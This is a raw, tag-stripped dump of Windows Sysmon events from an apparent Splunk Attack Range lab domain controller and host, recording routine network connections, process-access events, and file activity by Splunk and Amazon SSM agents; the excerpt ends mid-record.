SERVICEtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49488-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 354300x8000000000000000297866Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:53.164{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49488-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 10341000x8000000000000000297865Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:55.572{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297864Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:55.572{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000297863Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:55.426{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8618BDE21ED43BBC325FE15CDDBFCD1,SHA256=0648AFD81D4A91BA8A34D9D41B4448EC6DA8E41297B1F858C7D1EFED46135E68,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297862Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:55.410{C8EA50B7-F11D-6215-0B00-000000003802}6286484C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297861Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:55.410{C8EA50B7-F11D-6215-0B00-000000003802}6286484C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297860Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:55.410{C8EA50B7-F11D-6215-0B00-000000003802}6286484C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000297874Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:54.883{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49490-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000297873Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:54.883{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49490-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000297872Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:54.045{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49489-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000297871Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:54.045{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49489-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000297870Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:56.426{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16D48803B84D438517F9112FE5481D58,SHA256=9206611BF742784F10EAB153D21D018E7562AED612966589183C775A5F4D9405,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297875Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:57.457{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A988CC78B945CF2825B88BF1087E3DFB,SHA256=7F798958FFEFC2D0D27758A0B2D36EB33D3E6E6FBB06BDFB191A37BC976E745F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221793Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:57.024{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=795AC99CFF812A337A8BC6E238EA9B29,SHA256=7C7A6250729522B629125557E4D5D84C710A2106CD7497967557E71878F7FF83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297877Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:58.486{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-161MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297876Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:58.478{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4A5D39BAC8D90A8FDCEFCBEE21A7901,SHA256=1415E268646B95AC7A9951A63850B9F6C9CDA50144F61C5BE8155228DD56F740,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221794Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:58.040{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=196ECFC2E2CDD787C9F13A51D3B3EADF,SHA256=65C414F111691C888C6FB0D94475974D15E561E0CACA46D63A63942652BF8118,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297879Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:59.492{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=211E119C9144C1A587DB83E57210CCE4,SHA256=7E379F48B80E11986598AFCB437AEC8284323BD481A53FAD7669F1C0811E5FE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297878Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:59.490{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-162MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221795Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:59.056{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65CA6626630FDC34BDE247FEB2E9BE24,SHA256=C0AC6E93C93D8E1EA29C68A8ED78084BE56772E0CBF9E8595BFD3D0BE0A33BAB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297881Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:57.583{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49491-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297880Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:00.542{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4A143FAA86DFB84CAAEB6F893FC277C,SHA256=84EBC6E2D4091ABC7237EEBC9A3A5817717BBE7DFDB9A69838FF7A69B613F8FD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221797Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:58.695{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51673-false10.0.1.12-8000- 23542300x8000000000000000221796Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:00.259{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B39679037C148043BE9F78551DC13E9,SHA256=126C44AD853BACC5C791A9AA1EE26514B1A4B06E24A7F557067A051505B538FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297890Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:01.658{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03C63382E9B9B3F92D9FAD841B963ECF,SHA256=5CE98A1A75121AC77544E6476AD996F41C465CB6F73D4EE50257AF45D68CF780,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221798Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:01.477{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F749746208DCDFF643AE24D205C37DBD,SHA256=B9A1F2F3AC3955E56AAF962E040424808988E136E9E7961723932A04372DC268,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297889Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:01.457{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1825-6216-3E07-000000003802}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297888Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:01.457{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297887Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:01.457{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297886Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:01.457{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297885Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:01.457{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297884Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:01.457{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1825-6216-3E07-000000003802}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297883Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:01.457{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1825-6216-3E07-000000003802}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297882Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:01.458{C8EA50B7-1825-6216-3E07-000000003802}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000297900Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:02.663{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DD1248A90D574E03B8B8CED60849DE5,SHA256=25ADDBBC20BD348C8C258EBA87EDC3E468C1578B79323667C253ECF48B761348,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221799Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:02.509{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BCD3F7204F2BF990F34FE3853F121FD,SHA256=0849CA59813E43E0B330372FDC769F825DA06FA211401C6D28DA23AB0C7AD781,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297899Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:02.616{C8EA50B7-1826-6216-3F07-000000003802}66366544C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297898Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:02.327{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1826-6216-3F07-000000003802}6636C:\Program 